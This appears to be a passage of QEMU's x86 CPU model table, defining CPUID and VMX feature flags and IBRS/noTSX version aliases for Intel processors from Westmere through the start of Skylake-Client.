MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST, .xlevel = 0x80000008, .model_id = "Westmere E56xx/L56xx/X56xx (Nehalem-C)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Westmere-IBRS", .props = (PropValue[]) { { "spec-ctrl", "on" }, { "model-id", "Westmere E56xx/L56xx/X56xx (IBRS update)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "SandyBridge", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 42, .stepping = 1, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST, .xlevel = 0x80000008, .model_id = "Intel Xeon E312xx (Sandy Bridge)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "SandyBridge-IBRS", .props = (PropValue[]) { { "spec-ctrl", "on" }, { "model-id", "Intel Xeon E312xx (Sandy Bridge, IBRS update)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "IvyBridge", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 58, .stepping = 9, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_ERMS, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING, .xlevel = 0x80000008, .model_id = "Intel Xeon E3-12xx v2 (Ivy Bridge)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "IvyBridge-IBRS", .props = (PropValue[]) { { "spec-ctrl", "on" }, { "model-id", "Intel Xeon E3-12xx v2 (Ivy Bridge, IBRS)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Haswell", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 60, .stepping = 4, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Core Processor (Haswell)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Haswell-noTSX", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { "stepping", "1" }, { "model-id", "Intel Core Processor (Haswell, no TSX)", }, { NULL /* end of list */ } }, }, { .version = 3, .alias = "Haswell-IBRS", .props = (PropValue[]) { /* Restore TSX features removed by -v2 above */ { "hle", "on" }, { "rtm", "on" }, /* * Haswell and Haswell-IBRS had stepping=4 in * QEMU 4.0 and older */ { "stepping", "4" }, { "spec-ctrl", "on" }, { "model-id", "Intel Core Processor (Haswell, IBRS)" }, { NULL /* end of list */ } } }, { .version = 4, .alias = "Haswell-noTSX-IBRS", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, /* spec-ctrl was already enabled by -v3 above */ { "stepping", "1" }, { "model-id", "Intel Core Processor (Haswell, no TSX, IBRS)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Broadwell", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 61, .stepping = 2, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Core Processor (Broadwell)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Broadwell-noTSX", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { "model-id", "Intel Core Processor (Broadwell, no TSX)", }, { NULL /* end of list */ } }, }, { .version = 3, .alias = "Broadwell-IBRS", .props = (PropValue[]) { /* Restore TSX features removed by -v2 above */ { "hle", "on" }, { "rtm", "on" }, { "spec-ctrl", "on" }, { "model-id", "Intel Core Processor (Broadwell, IBRS)" }, { NULL /* end of list */ } } }, { .version = 4, .alias = "Broadwell-noTSX-IBRS", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, /* spec-ctrl was already enabled by -v3 above */ { "model-id", "Intel Core Processor (Broadwell, no TSX, IBRS)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Skylake-Client", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 94, .stepping = 3, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP, /* Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | 